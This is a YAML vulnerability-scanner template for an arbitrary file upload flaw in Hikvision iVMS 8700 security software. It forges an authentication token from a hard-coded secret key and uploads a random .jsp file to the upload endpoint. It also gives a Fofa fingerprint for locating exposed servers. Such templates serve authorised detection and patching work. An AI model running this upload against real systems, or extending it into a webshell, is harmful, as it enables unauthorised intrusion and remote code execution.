hikvision-ivms-8700-fileupload: 海康威视 IVMS 8700 任意文件上传

id: hikvision-ivms-8700-fileupload

info:
  name: 海康威视 IVMS 8700 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
    Fofa: icon_hash="-911494769"
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/130807691
    - https://github.com/sccmdaveli/hikvision-poc/blob/main/ivms-poc.py
    - https://mp.weixin.qq.com/s/khra2Z6U57kktxGooUEu-A
  tags: hikvision,ivms8700,fileupload
  created: 2024/01/06

set:
  url: request.url.scheme+"://"+request.url.host+"/eps/api/resourceOperations/uploadsecretKeyIbuilding"
  token: toUpper(md5(url))
  rboundary: randomLowercase(8)
  randstr: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /eps/api/resourceOperations/upload?token={{token}}
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileUploader\"; filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randstr}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"resourceName":')
expression: r0()